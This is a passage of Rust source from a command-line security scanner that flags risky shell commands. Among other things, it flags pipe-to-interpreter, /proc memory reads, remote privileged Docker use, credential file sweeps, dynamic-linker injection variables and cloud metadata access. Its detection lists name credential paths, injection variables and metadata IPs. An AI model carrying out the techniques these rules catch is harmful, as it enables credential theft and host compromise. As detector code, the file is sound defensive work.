1090
1091                    let mut evidence = vec![Evidence::CommandPattern {
1092                        pattern: "pipe to interpreter".to_string(),
1093                        matched: redact::redact_shell_assignments(&format!(
1094                            "{} | {}",
1095                            source.raw, seg.raw
1096                        )),
1097                    }];
1098                    for url in extract_urls_from_args(&source.args, shell) {
1099                        evidence.push(Evidence::Url { raw: url });
1100                    }
1101
1102                    findings.push(Finding {
1103                        rule_id,
1104                        severity: Severity::High,
1105                        title: format!("Pipe to interpreter: {source_cmd_ref} | {display_cmd}"),
1106                        description,
1107                        evidence,
1108                        human_view: None,
1109                        agent_view: None,
1110                        mitre_id: None,
1111                        custom_rule_id: None,
1112                    });
1113                }
1114            }
1115        }
1116    }
1117}
1118
1119fn check_dotfile_overwrite(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1120    for segment in segments {
1121        // Check for redirects to dotfiles
1122        let raw = &segment.raw;
1123        if (raw.contains("> ~/.")
1124            || raw.contains("> $HOME/.")
1125            || raw.contains(">> ~/.")
1126            || raw.contains(">> $HOME/."))
1127            && !raw.contains("> /dev/null")
1128        {
1129            findings.push(Finding {
1130                rule_id: RuleId::DotfileOverwrite,
1131                severity: Severity::High,
1132                title: "Dotfile overwrite detected".to_string(),
1133                description: "Command redirects output to a dotfile in the home directory, which could overwrite shell configuration".to_string(),
1134                evidence: vec![Evidence::CommandPattern {
1135                    pattern: "redirect to dotfile".to_string(),
1136                    matched: redact::redact_shell_assignments(raw),
1137                }],
1138                human_view: None,
1139                agent_view: None,
1140                mitre_id: None,
1141                custom_rule_id: None,
1142            });
1143        }
1144    }
1145}
1146
1147fn check_archive_extract(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1148    for segment in segments {
1149        if let Some(ref cmd) = segment.command {
1150            let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1151            if cmd_base == "tar" || cmd_base == "unzip" || cmd_base == "7z" {
1152                // Check if extracting to a sensitive directory
1153                let raw = &segment.raw;
1154                let sensitive_targets = [
1155                    "-C /",
1156                    "-C ~/",
1157                    "-C $HOME/",
1158                    "-d /",
1159                    "-d ~/",
1160                    "-d $HOME/",
1161                    "> ~/.",
1162                    ">> ~/.",
1163                ];
1164                for target in &sensitive_targets {
1165                    if raw.contains(target) {
1166                        findings.push(Finding {
1167                            rule_id: RuleId::ArchiveExtract,
1168                            severity: Severity::Medium,
1169                            title: "Archive extraction to sensitive path".to_string(),
1170                            description: format!(
1171                                "Archive command '{cmd_base}' extracts to a potentially sensitive location"
1172                            ),
1173                            evidence: vec![Evidence::CommandPattern {
1174                                pattern: "archive extract".to_string(),
1175                                matched: redact::redact_shell_assignments(raw),
1176                            }],
1177                            human_view: None,
1178                            agent_view: None,
1179                mitre_id: None,
1180                custom_rule_id: None,
1181                        });
1182                        return;
1183                    }
1184                }
1185            }
1186        }
1187    }
1188}
1189
1190// ---------------------------------------------------------------------------
1191// Process memory access detection
1192// ---------------------------------------------------------------------------
1193
/// Commands that read file contents — scoped to utilities commonly used
/// for proc memory dumping. Excludes echo/printf (not file readers).
///
/// `check_proc_mem_access` compares the wrapper-resolved command name of each segment
/// against this list and skips segments running anything else.
const PROC_MEM_READER_CMDS: &[&str] = &[
    "cat", "dd", "strings", "head", "tail", "xxd", "od", "base64", "hexdump", "less", "more", "cp",
    "grep",
];

/// Matches a process-memory path: `/proc/self/mem` or `/proc/<digits>/mem`, ending at
/// a word boundary (so `/proc/self/memory` does not match). The pattern is unanchored
/// and therefore also matches inside a longer argument such as `if=/proc/self/mem`.
static PROC_MEM_RE: Lazy<Regex> =
    Lazy::new(|| Regex::new(r"/proc/(?:self|\d+)/mem\b").expect("PROC_MEM_RE"));
1203
1204fn check_proc_mem_access(
1205    segments: &[tokenize::Segment],
1206    shell: ShellType,
1207    findings: &mut Vec<Finding>,
1208) {
1209    for seg in segments {
1210        let effective_seg =
1211            unwrap_env_split_string_segment(seg, shell).unwrap_or_else(|| seg.clone());
1212        let resolved_cmd = resolve_base_through_wrappers(&effective_seg, shell);
1213        if !PROC_MEM_READER_CMDS.contains(&resolved_cmd.as_str()) {
1214            continue;
1215        }
1216
1217        for arg in &effective_seg.args {
1218            let normalized = normalize_shell_token(arg, shell);
1219            if PROC_MEM_RE.is_match(&normalized) {
1220                findings.push(Finding {
1221                    rule_id: RuleId::ProcMemAccess,
1222                    severity: Severity::High,
1223                    title: "Process memory access detected".to_string(),
1224                    description: "Command reads from /proc/*/mem, which can dump process memory \
1225                                  contents including secrets and credentials"
1226                        .to_string(),
1227                    evidence: vec![Evidence::CommandPattern {
1228                        pattern: "proc memory read".to_string(),
1229                        matched: redact::redact_shell_assignments(&seg.raw),
1230                    }],
1231                    human_view: None,
1232                    agent_view: None,
1233                    mitre_id: None,
1234                    custom_rule_id: None,
1235                });
1236                return;
1237            }
1238            // dd-style: if=/proc/self/mem
1239            if let Some(val) = normalized.strip_prefix("if=") {
1240                if PROC_MEM_RE.is_match(val) {
1241                    findings.push(Finding {
1242                        rule_id: RuleId::ProcMemAccess,
1243                        severity: Severity::High,
1244                        title: "Process memory access detected".to_string(),
1245                        description: "Command reads from /proc/*/mem via dd, which can dump \
1246                                      process memory contents including secrets and credentials"
1247                            .to_string(),
1248                        evidence: vec![Evidence::CommandPattern {
1249                            pattern: "proc memory read".to_string(),
1250                            matched: redact::redact_shell_assignments(&seg.raw),
1251                        }],
1252                        human_view: None,
1253                        agent_view: None,
1254                        mitre_id: None,
1255                        custom_rule_id: None,
1256                    });
1257                    return;
1258                }
1259            }
1260        }
1261    }
1262}
1263
1264// ---------------------------------------------------------------------------
1265// Docker remote privilege escalation detection
1266// ---------------------------------------------------------------------------
1267
1268fn check_docker_remote_privesc(
1269    segments: &[tokenize::Segment],
1270    shell: ShellType,
1271    findings: &mut Vec<Finding>,
1272) {
1273    for seg in segments {
1274        let effective_seg =
1275            unwrap_env_split_string_segment(seg, shell).unwrap_or_else(|| seg.clone());
1276        let resolved_cmd = resolve_base_through_wrappers(&effective_seg, shell);
1277        if resolved_cmd != "docker" && resolved_cmd != "podman" {
1278            continue;
1279        }
1280
1281        let norm_args: Vec<String> = effective_seg
1282            .args
1283            .iter()
1284            .map(|a| normalize_shell_token(a, shell))
1285            .collect();
1286
1287        let has_remote = detect_docker_remote_host(&norm_args, &effective_seg, shell);
1288        if !has_remote {
1289            continue;
1290        }
1291
1292        let has_priv = norm_args.iter().any(|a| a == "--privileged");
1293        let has_root_mount = has_docker_root_mount(&norm_args);
1294
1295        if has_priv || has_root_mount {
1296            findings.push(Finding {
1297                rule_id: RuleId::DockerRemotePrivEsc,
1298                severity: Severity::Critical,
1299                title: "Docker remote privileged escalation detected".to_string(),
1300                description: "Command targets a remote Docker daemon with privileged access or \
1301                              host root mount, enabling full host compromise"
1302                    .to_string(),
1303                evidence: vec![Evidence::CommandPattern {
1304                    pattern: "docker remote privesc".to_string(),
1305                    matched: redact::redact_shell_assignments(&seg.raw),
1306                }],
1307                human_view: None,
1308                agent_view: None,
1309                mitre_id: None,
1310                custom_rule_id: None,
1311            });
1312            return;
1313        }
1314    }
1315}
1316
1317fn detect_docker_remote_host(
1318    norm_args: &[String],
1319    seg: &tokenize::Segment,
1320    shell: ShellType,
1321) -> bool {
1322    for (i, arg) in norm_args.iter().enumerate() {
1323        let lower = arg.to_lowercase();
1324        // -H=tcp://... or --host=tcp://... (combined form, quotes already stripped)
1325        if arg.starts_with("-H=tcp://") || lower.starts_with("--host=tcp://") {
1326            return true;
1327        }
1328        // -H tcp://... or --host tcp://... (flag + next arg)
1329        if arg == "-H" || lower == "--host" {
1330            if let Some(next) = norm_args.get(i + 1) {
1331                if next.starts_with("tcp://") {
1332                    return true;
1333                }
1334            }
1335        }
1336    }
1337    // DOCKER_HOST=tcp://... as env prefix (Path A: direct leading env assignment)
1338    for (name, value) in tokenize::leading_env_assignments(&seg.raw) {
1339        if name.eq_ignore_ascii_case("DOCKER_HOST") {
1340            let clean_val = normalize_shell_token(&value, shell);
1341            if clean_val.starts_with("tcp://") {
1342                return true;
1343            }
1344        }
1345    }
1346    // Path B: env wrapper form (env DOCKER_HOST=tcp://... docker ...)
1347    // Skip DOCKER_HOST= args that follow -e/--env (those set container env, not client remote)
1348    let args = &seg.args;
1349    for (i, arg) in args.iter().enumerate() {
1350        let norm = normalize_shell_token(arg, shell);
1351        if let Some(val) = norm
1352            .strip_prefix("DOCKER_HOST=")
1353            .or_else(|| norm.strip_prefix("docker_host="))
1354        {
1355            // Check if this arg is a container -e/--env value (not client config)
1356            if i > 0 {
1357                let prev = normalize_shell_token(&args[i - 1], shell);
1358                let prev_lower = prev.to_lowercase();
1359                if prev_lower == "-e" || prev_lower == "--env" {
1360                    continue; // container env, not client remote
1361                }
1362            }
1363            let clean_val = normalize_shell_token(val, shell);
1364            if clean_val.starts_with("tcp://") {
1365                return true;
1366            }
1367        }
1368    }
1369    false
1370}
1371
/// Return true when the (already normalized) docker arguments mount the host root.
///
/// Recognized forms, with the flag compared case-insensitively:
/// - `-v /:/…` or `--volume /:/…` (flag followed by its value);
/// - `-v=/:/…` or `--volume=/:/…`;
/// - `--mount <spec>` or `--mount=<spec>` whose spec has `src=/` or `source=/` as a
///   complete key (followed by `,` or at the end of the spec).
fn has_docker_root_mount(norm_args: &[String]) -> bool {
    /// True when a `--mount` spec names `/` as its source.
    fn mount_spec_binds_root(spec: &str) -> bool {
        ["src=/,", "source=/,"]
            .iter()
            .any(|needle| spec.contains(*needle))
            || ["src=/", "source=/"]
                .iter()
                .any(|tail| spec.ends_with(*tail))
    }

    norm_args.iter().enumerate().any(|(i, arg)| {
        let lower = arg.to_lowercase();
        // The value of a split flag is taken as written, not lowercased.
        let following = norm_args.get(i + 1).map(String::as_str);
        match lower.as_str() {
            "-v" | "--volume" => following.map_or(false, |val| val.starts_with("/:/")),
            "--mount" => following.map_or(false, |spec| mount_spec_binds_root(spec)),
            flag => {
                flag.starts_with("-v=/:/")
                    || flag.starts_with("--volume=/:/")
                    || flag
                        .strip_prefix("--mount=")
                        .map_or(false, |spec| mount_spec_binds_root(spec))
            }
        }
    })
}
1405
1406// ---------------------------------------------------------------------------
1407// Credential file sweep detection
1408// ---------------------------------------------------------------------------
1409
/// Path fragments that identify credential files or directories.
///
/// `check_credential_file_sweep` tests each entry as a substring of the
/// space-joined, normalized arguments, so an entry such as `/.ssh/id_` matches any
/// path containing that prefix. Each entry counts at most once per segment.
const CREDENTIAL_PATHS: &[&str] = &[
    "/.ssh/id_",
    "/.ssh/authorized_keys",
    "/.aws/credentials",
    "/.aws/config",
    "/.docker/config.json",
    "/.kube/config",
    "/.config/gcloud/",
    "/.npmrc",
    "/.pypirc",
    "/.netrc",
    "/.gnupg/",
    "/.config/gh/",
    "/.git-credentials",
];

/// Command names considered by `check_credential_file_sweep`; segments whose
/// wrapper-resolved command is not in this list are skipped.
const READ_ARCHIVE_VERBS: &[&str] = &[
    "cat", "tar", "zip", "gzip", "strings", "head", "tail", "base64", "xxd", "dd", "cp", "find",
    "xargs",
];
1430
1431fn check_credential_file_sweep(
1432    segments: &[tokenize::Segment],
1433    shell: ShellType,
1434    context: ScanContext,
1435    findings: &mut Vec<Finding>,
1436) {
1437    if context != ScanContext::Exec {
1438        return;
1439    }
1440
1441    for seg in segments {
1442        let effective_seg =
1443            unwrap_env_split_string_segment(seg, shell).unwrap_or_else(|| seg.clone());
1444        let resolved_cmd = resolve_base_through_wrappers(&effective_seg, shell);
1445        if !READ_ARCHIVE_VERBS.contains(&resolved_cmd.as_str()) {
1446            continue;
1447        }
1448
1449        let norm_args: Vec<String> = effective_seg
1450            .args
1451            .iter()
1452            .map(|a| normalize_shell_token(a, shell))
1453            .collect();
1454        let seg_text = norm_args.join(" ");
1455        let matched_count = CREDENTIAL_PATHS
1456            .iter()
1457            .filter(|p| seg_text.contains(**p))
1458            .count();
1459
1460        if matched_count >= 2 {
1461            findings.push(Finding {
1462                rule_id: RuleId::CredentialFileSweep,
1463                severity: Severity::Medium,
1464                title: "Multiple credential files accessed".to_string(),
1465                description: format!(
1466                    "Command accesses {matched_count} known credential file paths in a single \
1467                     invocation, which may indicate credential harvesting"
1468                ),
1469                evidence: vec![Evidence::CommandPattern {
1470                    pattern: "credential file sweep".to_string(),
1471                    matched: redact::redact_shell_assignments(&seg.raw),
1472                }],
1473                human_view: None,
1474                agent_view: None,
1475                mitre_id: None,
1476                custom_rule_id: None,
1477            });
1478            return;
1479        }
1480    }
1481}
1482
1483// ---------------------------------------------------------------------------
1484// Phase 8: Dangerous environment variable detection
1485// ---------------------------------------------------------------------------
1486
/// Environment variables that enable arbitrary code injection via dynamic linker.
///
/// `classify_env_var` upper-cases the name before the lookup and maps a hit to
/// `RuleId::CodeInjectionEnv` at `Severity::Critical`.
const CODE_INJECTION_VARS: &[&str] = &[
    "LD_PRELOAD",
    "LD_LIBRARY_PATH",
    "LD_AUDIT",
    "DYLD_INSERT_LIBRARIES",
    "DYLD_LIBRARY_PATH",
];

/// Environment variables that cause arbitrary script execution at shell startup.
///
/// Mapped by `classify_env_var` to `RuleId::ShellInjectionEnv` at
/// `Severity::Critical`.
const SHELL_INJECTION_VARS: &[&str] = &["BASH_ENV", "ENV", "PROMPT_COMMAND"];

/// Environment variables that hijack interpreter module/library search paths.
///
/// Mapped by `classify_env_var` to `RuleId::InterpreterHijackEnv` at
/// `Severity::High`.
const INTERPRETER_HIJACK_VARS: &[&str] = &["PYTHONPATH", "NODE_OPTIONS", "RUBYLIB", "PERL5LIB"];
1501
1502/// Sensitive credential variable names that should not be exported in commands.
1503use super::shared::SENSITIVE_KEY_VARS;
1504
1505fn classify_env_var(name: &str) -> Option<(RuleId, Severity, &'static str, &'static str)> {
1506    let name_upper = name.to_ascii_uppercase();
1507    let name = name_upper.as_str();
1508    if CODE_INJECTION_VARS.contains(&name) {
1509        Some((
1510            RuleId::CodeInjectionEnv,
1511            Severity::Critical,
1512            "Code injection environment variable",
1513            "can inject shared libraries into all processes, enabling arbitrary code execution",
1514        ))
1515    } else if SHELL_INJECTION_VARS.contains(&name) {
1516        Some((
1517            RuleId::ShellInjectionEnv,
1518            Severity::Critical,
1519            "Shell injection environment variable",
1520            "can cause arbitrary script execution at shell startup",
1521        ))
1522    } else if INTERPRETER_HIJACK_VARS.contains(&name) {
1523        Some((
1524            RuleId::InterpreterHijackEnv,
1525            Severity::High,
1526            "Interpreter hijack environment variable",
1527            "can hijack the interpreter's module/library search path",
1528        ))
1529    } else if SENSITIVE_KEY_VARS.contains(&name) {
1530        Some((
1531            RuleId::SensitiveEnvExport,
1532            Severity::High,
1533            "Sensitive credential exported",
1534            "exposes a sensitive credential that may be logged in shell history",
1535        ))
1536    } else {
1537        None
1538    }
1539}
1540
/// Cargo global flags that consume the next token as a value.
const CARGO_VALUE_FLAGS: &[&str] = &[
    "-Z",
    "-C",
    "--config",
    "--manifest-path",
    "--color",
    "--target-dir",
    "--target",
];

/// Locate the cargo subcommand — the first positional argument — and report whether
/// it is `install` or `add`.
///
/// Skipped on the way: toolchain specs (`+nightly`), any token starting with `-`
/// (including `--flag=value` forms), and the token following a flag listed in
/// `CARGO_VALUE_FLAGS`. Returns false when no positional argument is found.
fn is_cargo_install_or_add(args: &[String]) -> bool {
    let mut tokens = args.iter();
    while let Some(token) = tokens.next() {
        // Known value-taking flags: drop the flag and whatever follows it.
        if CARGO_VALUE_FLAGS.contains(&token.as_str()) {
            tokens.next();
            continue;
        }
        // Toolchain specs (+nightly, +stable) and every other flag occupy one token.
        if token.starts_with('+') || token.starts_with('-') {
            continue;
        }
        // First positional arg is the subcommand — only match install/add.
        return matches!(token.as_str(), "install" | "add");
    }
    false
}
1583
1584/// Warn when `cargo install/add` is used and no supply-chain audit directory exists.
1585fn check_vet_not_configured(
1586    segments: &[tokenize::Segment],
1587    cwd: Option<&str>,
1588    findings: &mut Vec<Finding>,
1589) {
1590    let is_cargo_install = segments.iter().any(|s| {
1591        if let Some(ref cmd) = s.command {
1592            let base = cmd
1593                .rsplit(['/', '\\'])
1594                .next()
1595                .unwrap_or(cmd)
1596                .to_ascii_lowercase();
1597            let base = base.strip_suffix(".exe").unwrap_or(&base);
1598            if base == "cargo" {
1599                return is_cargo_install_or_add(&s.args);
1600            }
1601        }
1602        false
1603    });
1604    if !is_cargo_install {
1605        return;
1606    }
1607
1608    // Check if supply-chain/ config exists relative to the analysis context cwd.
1609    // Require an explicit cwd — without one we cannot reliably check the filesystem.
1610    let cwd = match cwd {
1611        Some(dir) => dir,
1612        None => return,
1613    };
1614    let check_path = std::path::PathBuf::from(cwd).join("supply-chain/config.toml");
1615    if check_path.exists() {
1616        return;
1617    }
1618
1619    findings.push(Finding {
1620        rule_id: RuleId::VetNotConfigured,
1621        severity: Severity::Low,
1622        title: "No supply-chain audit configured".into(),
1623        description: "Consider running `cargo vet init` to enable dependency auditing.".into(),
1624        evidence: vec![],
1625        human_view: None,
1626        agent_view: None,
1627        mitre_id: None,
1628        custom_rule_id: None,
1629    });
1630}
1631
1632fn check_env_var_in_command(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1633    for segment in segments {
1634        let Some(ref cmd) = segment.command else {
1635            continue;
1636        };
1637        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1638
1639        match cmd_base.as_str() {
1640            "export" => {
1641                for arg in &segment.args {
1642                    if let Some((var_name, value)) = arg.split_once('=') {
1643                        emit_env_finding(var_name.trim(), value, findings);
1644                    }
1645                }
1646            }
1647            "env" => {
1648                for arg in &segment.args {
1649                    let trimmed = arg.trim();
1650                    if trimmed.starts_with('-') {
1651                        continue;
1652                    }
1653                    if let Some((var_name, value)) = trimmed.split_once('=') {
1654                        emit_env_finding(var_name.trim(), value, findings);
1655                    }
1656                }
1657            }
1658            "set" => {
1659                // Fish shell: set [-gx] VAR_NAME value...
1660                let mut var_name: Option<&str> = None;
1661                let mut value_parts: Vec<&str> = Vec::new();
1662                for arg in &segment.args {
1663                    let trimmed = arg.trim();
1664                    if trimmed.starts_with('-') && var_name.is_none() {
1665                        continue;
1666                    }
1667                    if var_name.is_none() {
1668                        var_name = Some(trimmed);
1669                    } else {
1670                        value_parts.push(trimmed);
1671                    }
1672                }
1673                if let Some(name) = var_name {
1674                    emit_env_finding(name, &value_parts.join(" "), findings);
1675                }
1676            }
1677            _ => {}
1678        }
1679    }
1680}
1681
1682fn emit_env_finding(var_name: &str, value: &str, findings: &mut Vec<Finding>) {
1683    let Some((rule_id, severity, title_prefix, desc_suffix)) = classify_env_var(var_name) else {
1684        return;
1685    };
1686    let value_preview = redact_env_value(value);
1687    findings.push(Finding {
1688        rule_id,
1689        severity,
1690        title: format!("{title_prefix}: {var_name}"),
1691        description: format!("Setting {var_name} {desc_suffix}"),
1692        evidence: vec![Evidence::EnvVar {
1693            name: var_name.to_string(),
1694            value_preview,
1695        }],
1696        human_view: None,
1697        agent_view: None,
1698        mitre_id: None,
1699        custom_rule_id: None,
1700    });
1701}
1702
/// Build the value preview stored in env-var evidence.
///
/// An empty value stays empty; any other value is replaced wholesale by the
/// `[REDACTED]` marker so no part of it is exposed.
fn redact_env_value(val: &str) -> String {
    match val {
        "" => String::new(),
        _ => String::from("[REDACTED]"),
    }
}
1710
1711// ---------------------------------------------------------------------------
1712// Phase 9 (free): Network destination detection
1713// ---------------------------------------------------------------------------
1714
/// Cloud metadata endpoint IPs that expose instance credentials.
///
/// Hosts are compared against this list by exact string equality, so only
/// the canonical dotted-quad spelling of each address is recognized.
const METADATA_ENDPOINTS: &[&str] = &["169.254.169.254", "100.100.100.200"];
1717
1718fn check_host_for_network_issues(arg: &str, findings: &mut Vec<Finding>) {
1719    if let Some(host) = extract_host_from_arg(arg) {
1720        if METADATA_ENDPOINTS.contains(&host.as_str()) {
1721            findings.push(Finding {
1722                rule_id: RuleId::MetadataEndpoint,
1723                severity: Severity::Critical,
1724                title: format!("Cloud metadata endpoint access: {host}"),
1725                description: format!(
1726                    "Command accesses cloud metadata endpoint {host}, \
1727                     which can expose instance credentials and sensitive configuration"
1728                ),
1729                evidence: vec![Evidence::Url {
1730                    raw: arg.to_string(),
1731                }],
1732                human_view: None,
1733                agent_view: None,
1734                mitre_id: None,
1735                custom_rule_id: None,
1736            });
1737        } else if is_private_ip(&host) {
1738            findings.push(Finding {
1739                rule_id: RuleId::PrivateNetworkAccess,
1740                severity: Severity::High,
1741                title: format!("Private network access: {host}"),
1742                description: format!(
1743                    "Command accesses private network address {host}, \
1744                     which may indicate SSRF or lateral movement"
1745                ),
1746                evidence: vec![Evidence::Url {
1747                    raw: arg.to_string(),
1748                }],
1749                human_view: None,
1750                agent_view: None,
1751                mitre_id: None,
1752                custom_rule_id: None,
1753            });
1754        }
1755    }
1756}
1757
1758fn check_network_destination(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1759    for segment in segments {
1760        let Some(ref cmd) = segment.command else {
1761            continue;
1762        };
1763        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1764        if !is_source_command(&cmd_base) {
1765            continue;
1766        }
1767
1768        for arg in &segment.args {
1769            let trimmed = arg.trim().trim_matches(|c: char| c == '\'' || c == '"');
1770            if trimmed.starts_with('-') {
1771                // Check flag=value args for embedded URLs (e.g., --url=http://evil.com)
1772                if let Some((_flag, value)) = trimmed.split_once('=') {
1773                    check_host_for_network_issues(value, findings);
1774                }
1775                continue;
1776            }
1777
1778            check_host_for_network_issues(trimmed, findings);
1779        }
1780    }
1781}
1782
/// Extract a host/IP from a URL-like command argument.
///
/// Two shapes are understood:
///
/// * `scheme://[userinfo@]host[:port]` followed by an optional path, query
///   or fragment — any non-empty host is returned (hostname or IP literal).
/// * A bare IPv4 address or bracketed IPv6 literal, optionally followed by
///   `:port` and/or `/path`. Anything else without a scheme is ignored, so
///   flags and file names do not produce a host.
///
/// Returns the host without userinfo, port, or IPv6 brackets, or `None`
/// when no host can be identified.
fn extract_host_from_arg(arg: &str) -> Option<String> {
    // URL with scheme: http://HOST[:PORT]/path
    if let Some((_scheme, rest)) = arg.split_once("://") {
        // Isolate the authority first: it ends at the first '/', '?' or '#'.
        // Searching the whole remainder for '@' would let a path such as
        // `/latest/x@example.com` pose as userinfo and hide the real host.
        let authority = rest
            .split(|c: char| matches!(c, '/' | '?' | '#'))
            .next()
            .unwrap_or(rest);
        // Strip userinfo (anything before @)
        let host_port = match authority.find('@') {
            Some(at_idx) => &authority[at_idx + 1..],
            None => authority,
        };
        let host = strip_port(host_port);
        // Reject obviously invalid hosts (e.g. an unterminated IPv6 bracket).
        if host.is_empty() || host.contains('[') {
            return None;
        }
        return Some(host);
    }

    // Bare host/IP: "169.254.169.254/path" or just "169.254.169.254"
    let host_part = arg.split('/').next().unwrap_or(arg);
    let host = strip_port(host_part);

    // Without a scheme only literal IPv4 addresses are accepted, so ordinary
    // words such as file names are never mistaken for hosts.
    if host.parse::<std::net::Ipv4Addr>().is_ok() {
        return Some(host);
    }

    // Accept bracketed IPv6: [::1]
    if let Some(inner) = host_part.strip_prefix('[') {
        if let Some((ipv6, _after_bracket)) = inner.split_once(']') {
            if ipv6.parse::<std::net::Ipv6Addr>().is_ok() {
                return Some(ipv6.to_string());
            }
        }
    }

    None
}

/// Strip port number from a host:port string, handling IPv6 brackets.
///
/// * `[v6]` / `[v6]:port` → the address between the brackets.
/// * More than one colon without brackets → returned unchanged (treated as
///   an unbracketed IPv6 address).
/// * `host:port` → `host` when the port is numeric or empty. An empty port
///   (`host:`) is valid URL syntax meaning "default port", and the same
///   shape appears in scp-style `host:path` targets.
/// * Anything else is returned unchanged.
fn strip_port(host_port: &str) -> String {
    // Handle IPv6: [::1]:8080
    if let Some(inner) = host_port.strip_prefix('[') {
        if let Some(bracket_end) = inner.find(']') {
            return inner[..bracket_end].to_string();
        }
    }
    // Don't strip from unbracketed IPv6 (multiple colons)
    if host_port.matches(':').count() > 1 {
        return host_port.to_string();
    }
    // IPv4 or hostname with single colon: strip trailing :PORT
    if let Some((host, port)) = host_port.rsplit_once(':') {
        if port.is_empty() || port.parse::<u16>().is_ok() {
            return host.to_string();
        }
    }
    host_port.to_string()
}
1847
/// Report whether `host` is an IPv4 literal inside one of the private
/// ranges `10.0.0.0/8`, `172.16.0.0/12`, or `192.168.0.0/16`.
///
/// Loopback (`127.x`) is deliberately not treated as private — local traffic
/// has no SSRF/lateral movement risk. Anything that does not parse as an
/// IPv4 address yields `false`.
fn is_private_ip(host: &str) -> bool {
    let Ok(addr) = host.parse::<std::net::Ipv4Addr>() else {
        return false;
    };
    match addr.octets() {
        [127, ..] => false,
        [10, ..] => true,
        [172, second, ..] => (16..=31).contains(&second),
        [192, 168, ..] => true,
        _ => false,
    }
}
1862
/// POSIX fetch commands — appropriate for both `tirith run` and `vet` hints.
///
/// Entries are lowercase and lookups are exact string comparisons, so
/// callers are expected to pass an already-lowercased command name.
const POSIX_FETCH_COMMANDS: &[&str] = &["curl", "wget", "http", "https", "xh", "fetch"];

/// PowerShell fetch commands — appropriate for `vet` hints only
/// (`tirith run` doesn't support PowerShell interpreter flows).
const POWERSHELL_FETCH_COMMANDS: &[&str] =
    &["iwr", "irm", "invoke-webrequest", "invoke-restmethod"];

/// Source commands that are not URL-fetching (no vet/tirith-run hints).
/// They still count as source commands for `is_source_command`.
const NON_FETCH_SOURCE_COMMANDS: &[&str] = &["scp", "rsync"];
1873
1874fn is_source_command(cmd: &str) -> bool {
1875    POSIX_FETCH_COMMANDS.contains(&cmd)
1876        || POWERSHELL_FETCH_COMMANDS.contains(&cmd)
1877        || NON_FETCH_SOURCE_COMMANDS.contains(&cmd)
1878}
1879
1880/// All URL-fetching commands (union of POSIX + PowerShell).
1881fn is_url_fetch_command(cmd: &str) -> bool {
1882    POSIX_FETCH_COMMANDS.contains(&cmd) || POWERSHELL_FETCH_COMMANDS.contains(&cmd)
1883}
1884
1885/// Whether this fetch source supports `tirith run` hints.
1886/// True only for POSIX fetch commands (`tirith run` is a shell-script runner).
1887fn supports_tirith_run_hint(cmd: &str) -> bool {
1888    POSIX_FETCH_COMMANDS.contains(&cmd)
1889}
1890
/// True when `s` begins with `http://` or `https://`, ignoring ASCII case
/// in the scheme. The comparison works on bytes, so it is safe for input
/// containing multi-byte characters.
fn starts_with_http_scheme(s: &str) -> bool {
    const SCHEMES: [&[u8]; 2] = [b"https://", b"http://"];
    let bytes = s.as_bytes();
    SCHEMES.iter().any(|&scheme| {
        bytes.len() >= scheme.len() && bytes[..scheme.len()].eq_ignore_ascii_case(scheme)
    })
}
1897
/// Strip control characters from a URL so it cannot inject ANSI escapes,
/// newlines, or other terminal-interpreted sequences into the finding
/// description displayed to the user.
///
/// Removes every character in Unicode general category `Cc`: the C0 range
/// (U+0000–U+001F), DEL (U+007F), and the C1 range (U+0080–U+009F). C1 is
/// included because some terminals treat code points such as U+009B (CSI)
/// as the start of an escape sequence, just like `ESC [`.
fn sanitize_url_for_display(url: &str) -> String {
    url.chars().filter(|c| !c.is_control()).collect()
}
1904
1905/// Extract all URLs from command arguments.
1906fn extract_urls_from_args(args: &[String], shell: ShellType) -> Vec<String> {
1907    let mut urls = Vec::new();
1908    for arg in args {
1909        let normalized = normalize_shell_token(arg.trim(), shell);
1910
1911        if starts_with_http_scheme(&normalized) {
1912            urls.push(normalized);
1913            continue;
1914        }
1915
1916        // Check --flag=<url> forms (e.g., --url=https://...)
1917        if let Some((_, val)) = normalized.split_once('=') {
1918            if starts_with_http_scheme(val) {
1919                urls.push(val.to_string());
1920            }
1921        }
1922    }
1923    urls
1924}
1925
1926/// Check command destination hosts against policy network deny/allow lists (Team feature).
1927///
1928/// For each source command (curl, wget, etc.), extracts the destination host and
1929/// checks against deny/allow lists. Allow takes precedence (exempts from deny).
1930pub fn check_network_policy(
1931    input: &str,
1932    shell: ShellType,
1933    deny: &[String],
1934    allow: &[String],
1935) -> Vec<Finding> {
1936    if deny.is_empty() {
1937        return Vec::new();
1938    }
1939
1940    let segments = tokenize::tokenize(input, shell);
1941    let mut findings = Vec::new();
1942
1943    for segment in &segments {
1944        let Some(ref cmd) = segment.command else {
1945            continue;
1946        };
1947        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1948        if !is_source_command(&cmd_base) {
1949            continue;
1950        }
1951
1952        for arg in &segment.args {
1953            let trimmed = arg.trim().trim_matches(|c: char| c == '\'' || c == '"');
1954            if trimmed.starts_with('-') {
1955                // Check flag=value args for embedded URLs (e.g., --url=http://evil.com)
1956                if let Some((_flag, value)) = trimmed.split_once('=') {
1957                    if let Some(host) = extract_host_from_arg(value) {
1958                        if matches_network_list(&host, allow) {
1959                            continue;
1960                        }
1961                        if matches_network_list(&host, deny) {
1962                            findings.push(Finding {
1963                                rule_id: RuleId::CommandNetworkDeny,
1964                                severity: Severity::Critical,
1965                                title: format!("Network destination denied by policy: {host}"),
1966                                description: format!(
1967                                    "Command accesses {host}, which is on the network deny list"
1968                                ),
1969                                evidence: vec![Evidence::Url {
1970                                    raw: value.to_string(),
1971                                }],
1972                                human_view: None,
1973                                agent_view: None,
1974                                mitre_id: None,
1975                                custom_rule_id: None,
1976                            });
1977                            continue;
1978                        }
1979                    }
1980                }
1981                continue;
1982            }
1983
1984            if let Some(host) = extract_host_from_arg(trimmed) {
1985                // Allow list exempts from deny
1986                if matches_network_list(&host, allow) {
1987                    continue;
1988                }
1989                if matches_network_list(&host, deny) {
1990                    findings.push(Finding {
1991                        rule_id: RuleId::CommandNetworkDeny,
1992                        severity: Severity::Critical,
1993                        title: format!("Network destination denied by policy: {host}"),
1994                        description: format!(
1995                            "Command accesses {host}, which is on the network deny list"
1996                        ),
1997                        evidence: vec![Evidence::Url {
